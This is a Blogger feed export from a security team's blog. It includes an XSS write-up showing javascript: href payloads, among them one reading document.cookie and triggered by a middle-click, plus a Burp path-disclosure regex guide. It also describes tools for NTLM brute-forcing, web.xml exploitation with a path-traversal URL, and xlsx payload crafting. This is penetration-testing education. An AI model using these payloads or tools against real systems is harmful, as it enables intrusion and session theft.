tag:blogger.com,1999:blog-21859860605838728312024-03-13T21:30:16.683-07:00DcLabs - Security TeamUnknownnoreply@blogger.comBlogger32125tag:blogger.com,1999:blog-2185986060583872831.post-89520479050895344882021-05-12T02:45:00.006-07:002021-05-12T03:00:10.198-07:00 The curious case of XSS and the mouse middle button.<p>Hi guys! Today I will share my experience of how I exploited an XSS in a pretty particular scenario. </p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">During analysis, there was a feature on the application that allows the customer to add external reference links for specific options.</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">So, there were input filters not allowing double quotes, <,>, and other chars. The injection would happen only in the href parameter.</span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Basically: </span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><b><i><a href="<xss_here>" target="_blank">ClickMe</a></i></b></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">At this point, I thought, piece of cake, I will inject a standard payload like<b><i> javascript:alert(1)</i></b>, and that's it, exploited! <br /><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><b><i><a href="javascript:alert(1)" target="_blank">ClickMe</a></i></b> Right?</span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"> </span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">WRONG! </span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">As you know, the "target" parameter controls the window link behavior. </span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">In this case, it forces the link to open in a new tab due to the _blank value. When you left-click (the usual behavior), on the link, even with the <b><i>javascript:alert(1)</i></b> payload, the browsers handle it differently:</span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Firefox:</strong><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"> Opens a new blank tab with the payload on the URL address bar<br /><br /></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-80nwqGFP-kA/YJuSFKH1GNI/AAAAAAAACiA/ZJrFHxvtN3UlnQ0QNmuwhNZZ5JGv8m7xQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="292" data-original-width="591" height="198" src="https://lh3.googleusercontent.com/-80nwqGFP-kA/YJuSFKH1GNI/AAAAAAAACiA/ZJrFHxvtN3UlnQ0QNmuwhNZZ5JGv8m7xQCLcBGAsYHQ/w400-h198/image.png" width="400" /></a></div><br /> <br /><div style="text-align: left;"><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">Chrome and Edge:</strong><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"> Open a new blank tab with about:blank#blocked on the URL address bar. <br /></span><br /><br /></div><div style="text-align: left;"><br /></div><div style="text-align: center;"><a href="https://lh3.googleusercontent.com/-fZ9eXwdg3GI/YJuSfzILwTI/AAAAAAAACiM/wNobdUcxN94TcLP3ueC5UE8qJMbFemt8ACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="226" data-original-width="571" height="159" src="https://lh3.googleusercontent.com/-fZ9eXwdg3GI/YJuSfzILwTI/AAAAAAAACiM/wNobdUcxN94TcLP3ueC5UE8qJMbFemt8ACLcBGAsYHQ/w400-h159/image.png" width="400" /></a><br /><br /></div><span style="color: black;"><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-fZ9eXwdg3GI/YJuSfzILwTI/AAAAAAAACiM/wNobdUcxN94TcLP3ueC5UE8qJMbFemt8ACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"></a><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-fZ9eXwdg3GI/YJuSfzILwTI/AAAAAAAACiM/wNobdUcxN94TcLP3ueC5UE8qJMbFemt8ACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"></a><a href="https://lh3.googleusercontent.com/-l7sbdNWCr5c/YJuSWR0zZbI/AAAAAAAACiI/3n_J9EASokUP3iF5279bpPravaoU2GobQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img alt="" data-original-height="198" data-original-width="568" height="140" src="https://lh3.googleusercontent.com/-l7sbdNWCr5c/YJuSWR0zZbI/AAAAAAAACiI/3n_J9EASokUP3iF5279bpPravaoU2GobQCLcBGAsYHQ/w400-h140/image.png" width="400" /></a></div><div style="text-align: left;"></div></div></span><p></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br />So, based on this behavior, it's clear it cannot be exploited just by left-clicking on the link.</span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">I tried to change the target parameter value using javascript, but the instruction to open a new tab executes first, so there is no way to rewrite the value on the fly. </span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">After some research, I found these links https://bugzilla.mozilla.org/show_bug.cgi?id=55696 and https://support.mozilla.org/en-US/questions/1289787 related to new tab/window and javascript execution. Then the idea to use the mouse middle button popped up, and BANG! </span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">By default, the browsers(Firefox, Chrome, and Edge) have the middle button configured to force open links in a new tab. So, by using this button, the browsers executed the Javascript! Also, this time, the behavior was slightly different, and it can interfere during the exploitation. To test these conditions, I changed the payload to <b><i>javascript:alert(document.cookie) </i></b></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Firefox:</strong><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"> The browser executed the javascript in a new blank tab. However, the javascript could not read the cookie, as expected, due to run in a blank tab out of the application context.</span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-ryR23bQSudU/YJugCRMuleI/AAAAAAAACiY/59V1hfTwsIg99UV43lbLmY_qO1W8mLJnQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black;"><img alt="" data-original-height="504" data-original-width="753" height="268" src="https://lh3.googleusercontent.com/-ryR23bQSudU/YJugCRMuleI/AAAAAAAACiY/59V1hfTwsIg99UV43lbLmY_qO1W8mLJnQCLcBGAsYHQ/w400-h268/image.png" width="400" /></span></a></div><br /><br /><br /><p></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><strong style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">Chrome and Edge:</strong><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"> The browsers weirdly did not open a new tab, even forced by the middle button. So, the javascript is executed in the application context. That is, it can read the application cookies.</span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-4O1KDLWDejM/YJugaXPdd3I/AAAAAAAACig/uA4ge-DgFbEkVoj3cLfyac5KA05FWXJnwCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="236" data-original-width="709" height="134" src="https://lh3.googleusercontent.com/-4O1KDLWDejM/YJugaXPdd3I/AAAAAAAACig/uA4ge-DgFbEkVoj3cLfyac5KA05FWXJnwCLcBGAsYHQ/w400-h134/image.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-xN8a1dCUOTU/YJugmXuZ2RI/AAAAAAAACik/Ys7ACy-5KeME9aRCcnFblklbCxnRcaZXgCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="247" data-original-width="872" height="114" src="https://lh3.googleusercontent.com/-xN8a1dCUOTU/YJugmXuZ2RI/AAAAAAAACik/Ys7ACy-5KeME9aRCcnFblklbCxnRcaZXgCLcBGAsYHQ/w400-h114/image.png" width="400" /></a></div><br /><br /></div><br /><br /><p></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;">That's all, folks! Cya!</p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; color: #0e101a; margin-bottom: 0pt; margin-top: 0pt;"></p>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2185986060583872831.post-71933267362947023872021-03-23T04:07:00.001-07:002021-03-23T04:12:57.121-07:00Burp Suite - Adding Internal Path Disclosure Capabilities Hi guys, I hope everyone is healthy. <br /><br />If you work with Burp suite, maybe you noticed Burp cannot identify Internal PATH Disclosure vulnerabilities by default.<br /><br />I know most of the time, this vulnerability is ranked as Informational or Low. But I decided to write this after using the information acquired due to the internal path leakage to perform a more complex chain attack. <br /><br />For this reason, the vulnerability was ranked as high due to the overall impact. In other words, I would not be able to create an effective attack chain without this leaked path.<br /><br />The implementation is quite simple: <br /><br />Install the extension Burp Bounty (Unfortunately, it is available for Buro Pro only).<br />On the tab Profiles -> Passive Response Profiles -> Add<br />Fulfill the fields(Response) and click on Add<br />Here you add the regex you are looking for. It's possible to add more than one regex. In my case, I created two different profiles, one for Windows issues and another one for Linux. <br /><br />Following the regex for both cases: <br /><br />Linux: (?<!\S)(?:/[^/\s>]+)+<br />Thanks to codeworm for the help with Linux regex.<br /><br />Windows: ([a-zA-Z]):\\?(\\[a-zA-Z0-9._-].*\s.*+)+\\<br />For Windows, the regex needs some enhancements. <br /><br />The new issues:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-x22uvG1Injw/YFnEaeWniXI/AAAAAAAACgA/kOwqWz-gWuI22NEa-kYKSrcoj9g0dHReQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="751" data-original-width="890" src="https://lh3.googleusercontent.com/-x22uvG1Injw/YFnEaeWniXI/AAAAAAAACgA/kOwqWz-gWuI22NEa-kYKSrcoj9g0dHReQCLcBGAsYHQ/s16000/image.png" /></a></div><br /><br /><br />Now, some extra configuration is required to Burp shows it properly on the Target tab.<br />Click on the Issue tab and fulfill the fields. The Severy and Confidence must be selected. You are free to select the rating you want. The issue detail is the information that will be displayed on the Target tab.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-EYa6IA4Ea6s/YFnGA7pNooI/AAAAAAAACgI/zicjv_p_QngOeOJ2yaX_Uu9Nkiydc_N3QCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="666" data-original-width="798" src="https://lh3.googleusercontent.com/-EYa6IA4Ea6s/YFnGA7pNooI/AAAAAAAACgI/zicjv_p_QngOeOJ2yaX_Uu9Nkiydc_N3QCLcBGAsYHQ/s16000/image.png" /></a></div><br />After you added all the information, click OK and double-check if everything is saved. Sometimes the extension does not save the regex, them you must add it again.<br /><br />Testing your new issues:<br /><br />Navigate to: https://owasp.org/www-community/attacks/Full_Path_Disclosure and run a passive scan on this page.<br /><br />Your Burp should show something like that:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-mXJDEph_JTg/YFnJPx2WQxI/AAAAAAAACgQ/s-_dWXWzrHMMblb4-XeBQ63h1x831o0wACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="344" data-original-width="1202" src="https://lh3.googleusercontent.com/-mXJDEph_JTg/YFnJPx2WQxI/AAAAAAAACgQ/s-_dWXWzrHMMblb4-XeBQ63h1x831o0wACLcBGAsYHQ/s16000/image.png" /></a></div><br /><br />Note: The Severity and Confidence are different on purpose, just to show it is possible to assess it differently.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-05s0S2Z1dGQ/YFnJ5LpIfzI/AAAAAAAACgY/d8KSGIn_ZicPpNYkXSBWYRr2ZKkKXygcACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="728" data-original-width="567" src="https://lh3.googleusercontent.com/-05s0S2Z1dGQ/YFnJ5LpIfzI/AAAAAAAACgY/d8KSGIn_ZicPpNYkXSBWYRr2ZKkKXygcACLcBGAsYHQ/s16000/image.png" /></a></div><br /><br /><p>Checking the match on the source code:<br /><br />Linux: <br /><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-lceWdlna6Y0/YFnLFqo9ShI/AAAAAAAACgg/VrU4uQRGV0gnldwWb_Duq69LY2CWk8sSQCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="707" data-original-width="1123" src="https://lh3.googleusercontent.com/-lceWdlna6Y0/YFnLFqo9ShI/AAAAAAAACgg/VrU4uQRGV0gnldwWb_Duq69LY2CWk8sSQCLcBGAsYHQ/s16000/image.png" /></a></div><br /><br />Windows:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-w6LgVtlSsY4/YFnLVz8GLOI/AAAAAAAACgo/pCpeG7aEbZUz_dHccWrYsTZe3IaTrxglwCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="499" data-original-width="1075" src="https://lh3.googleusercontent.com/-w6LgVtlSsY4/YFnLVz8GLOI/AAAAAAAACgo/pCpeG7aEbZUz_dHccWrYsTZe3IaTrxglwCLcBGAsYHQ/s16000/image.png" /></a></div><br /><br /> <br />This it, guys! <br />Since I update the windows regex, I will update the post.<p></p>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-3434955023384004382021-03-23T03:17:00.002-07:002021-03-23T03:17:25.288-07:00WebNBFWebNBF<br />https://github.com/crashbrz/WebNBF<br /><br />Simple Bash "Multitask" Web NTLM Authentication Bruteforcer.<br /><a href="https://github.com/crashbrz/WebNBF#usagehelp"></a>Usage/Help./webnbf.sh <userlist> <passwordlist> https://target
<br /><br /><a href="https://github.com/crashbrz/WebNBF#proxy"></a>Proxy<br /><br />Add or remove the curl proxy parameters according to your environment.Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2185986060583872831.post-28165754171094591592021-03-23T03:16:00.000-07:002021-03-23T03:16:05.955-07:00WebXmlExploiter<br />WebXmlExploiter<br />https://github.com/crashbrz/WebXmlExploiter<br /><br />The WebXmlExploiter is a tool to exploit exposed by misconfiguration or path traversal web.xml files.<br />It will try to download all .class and XML files based on the information extracted from the web.xml file.<br /><a href="https://github.com/crashbrz/WebXmlExploiter#notes"></a><br />Notes<br />WebXmlExploiter is an exploitation tool only, not a vulnerability scanner.<br />I will not add a brute-forcing feature since tools like wfuzz,ffuzz, and burp suite can do it better.<br />I recommend running the jadx to decompile the .class files.<br /><a href="https://github.com/crashbrz/WebXmlExploiter#installation"></a><br />Installation<br />Download the latest release and unpack it in the desired location.<br />Remember to install GoLang in case you want to run from the source.<br />WebXmlExploiter uses the github.com/antchfx/xmlquery libraries.<br /><br />Check the following link for more information: <a href="https://github.com/antchfx/xmlquery/">https://github.com/antchfx/xmlquery/</a><br /><br />Run: go get github.com/antchfx/xmlquery before running the WebXmlExploiter.<br /><a href="https://github.com/crashbrz/WebXmlExploiter#license"></a><br />License<br />WebXmlExploiter is licensed under the SushiWare license. Check <a href="https://github.com/crashbrz/WebXmlExploiter/blob/main/docs/license.txt">docs/license.txt</a> for more information.<br /><a href="https://github.com/crashbrz/WebXmlExploiter#usagehelp"></a>Usage/Help<br /><br />Please refer to the output of -h for usage information and general help. Also, you can contact me on ##spoonfed@freenode.org (two #)<br /><br /><br />Example: go run webxmlexploiter.go -u <a href="https://vulnapp/WEB-INF/">https://vulnapp/somedir/anotherdir/../../../WEB-INF/</a><br /><br />Go Version<br /><br />Tested on:<br />go version go1.14.4 windows/amd64<br />go version go1.15.2 linux/amd64<br /><a href="https://github.com/crashbrz/WebXmlExploiter#to-do"></a><br />To Do<br />Parsing enhancements Add cookies support.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-1824944119537106592020-07-01T06:29:00.000-07:002020-07-01T06:29:14.320-07:00Xcrafter - Portable Excel Open XML format command line file crafter<h1 style="border-bottom: 1px solid rgb(234, 236, 239); box-sizing: border-box; line-height: 1.25; margin: 24px 0px 16px; padding-bottom: 0.3em;">
<span style="background-color: black; color: white;">
Xcrafter</span></h1>
<div style="box-sizing: border-box; font-size: 16px; margin-bottom: 16px;">
<span style="background-color: black; color: white;">Xcrafter is a portable Excel Open XML format command line file crafter. Xcrafter allows you to create xlsx files and embed payloads, like XSS, XXE, SQli,SSRF, and others in an easy and fast way, even without Excel or Calc installed.</span></div>
<div style="box-sizing: border-box; font-size: 16px; margin-bottom: 16px;">
<span style="background-color: black; color: white;">Also, Xcrafter can create regular excel files if you are not looking for a security tool.</span></div>
<h3 style="box-sizing: border-box; font-size: 1.25em; line-height: 1.25; margin-bottom: 16px; margin-top: 24px;">
<a aria-hidden="true" class="anchor" href="https://github.com/crashbrz/Xcrafter#installation" id="user-content-installation" style="box-sizing: border-box; float: left; line-height: 1; margin-left: -20px; padding-right: 4px;"><svg aria-hidden="true" class="octicon octicon-link" height="16" version="1.1" viewbox="0 0 16 16" width="16"><span style="background-color: black; color: white;"><path d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z" fill-rule="evenodd"></path></span></svg></a><span style="background-color: black; color: white;">Installation</span></h3>
<div style="box-sizing: border-box; font-size: 16px; margin-bottom: 16px;">
<span style="background-color: black; color: white;">Download the latest release and unpack it in the desired location. Remember to install GoLang in case you want to run from the source. The Xcrafter uses the Excelize library. Check <a href="https://github.com/360EntSecGroup-Skylar/excelize/" style="box-sizing: border-box;">https://github.com/360EntSecGroup-Skylar/excelize/</a> for more information.</span></div>
<div style="box-sizing: border-box; font-size: 16px; margin-bottom: 16px;">
<span style="background-color: black; color: white;"><a href="https://github.com/crashbrz/Xcrafter/blob/master/bin" style="box-sizing: border-box;">Here</a> you can find the compiled binary.</span></div>
<h3 style="box-sizing: border-box; font-size: 1.25em; line-height: 1.25; margin-bottom: 16px; margin-top: 24px;">
<a aria-hidden="true" class="anchor" href="https://github.com/crashbrz/Xcrafter#license" id="user-content-license" style="box-sizing: border-box; float: left; line-height: 1; margin-left: -20px; padding-right: 4px;"><svg aria-hidden="true" class="octicon octicon-link" height="16" version="1.1" viewbox="0 0 16 16" width="16"><span style="background-color: black; color: white;"><path d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z" fill-rule="evenodd"></path></span></svg></a><span style="background-color: black; color: white;">License</span></h3>
<div style="box-sizing: border-box; font-size: 16px; margin-bottom: 16px;">
<span style="background-color: black; color: white;">Xcrafter is licensed under the SushiWare license. Check <a href="https://github.com/crashbrz/Xcrafter/blob/master/docs/license.txt" style="box-sizing: border-box;">docs/license.txt</a> for more information.</span></div>
<h3 style="box-sizing: border-box; font-size: 1.25em; line-height: 1.25; margin-bottom: 16px; margin-top: 24px;">
<a aria-hidden="true" class="anchor" href="https://github.com/crashbrz/Xcrafter#usagehelp" id="user-content-usagehelp" style="box-sizing: border-box; float: left; line-height: 1; margin-left: -20px; padding-right: 4px;"><svg aria-hidden="true" class="octicon octicon-link" height="16" version="1.1" viewbox="0 0 16 16" width="16"><span style="background-color: black; color: white;"><path d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z" fill-rule="evenodd"></path></span></svg></a><span style="background-color: black; color: white;">Usage/Help</span></h3>
<div style="box-sizing: border-box; font-size: 16px; margin-bottom: 16px;">
<span style="background-color: black; color: white;">Please refer to the output of -h for usage information and general help. Also, you can contact me on <code style="border-radius: 6px; box-sizing: border-box; font-size: 13.6px; margin: 0px; padding: 0.2em 0.4em;">##spoonfed@freenode.org</code> (two #)</span></div>
<pre style="border-radius: 6px; box-sizing: border-box; font-size: 13.6px; line-height: 1.45; overflow-wrap: normal; overflow: auto; padding: 16px;"><code style="border-radius: 6px; border: 0px; box-sizing: border-box; display: inline; line-height: inherit; margin: 0px; overflow-wrap: normal; overflow: visible; padding: 0px; word-break: normal;"><span style="background-color: black; color: white;">Usage of Xcrafter.exe:
-c string
Column as a range where the payload will be placed. Use a colon as a range separator and a comma to add a new range. Ex: C1:F1,J7:N7,H1:K1
-e string
Use this option to set a different payload from -p option. For single cells only.
-l string
Line range of a column where the payload will be placed. Use a colon as a range separator and a comma to add a new range. Ex. A1:A10,B1:B10
-o string
Crafted file name output. (default "Xcrafter.xlsx")
-p string
Any payload to be written in the file.
-s string
Single cells where the payload will be placed. Use a comma as a separator. Ex: A1,H4,D20
-v Prints the current version and exit.
-w string
Set the worksheet name. (default "Sheet1")</span></code></pre>
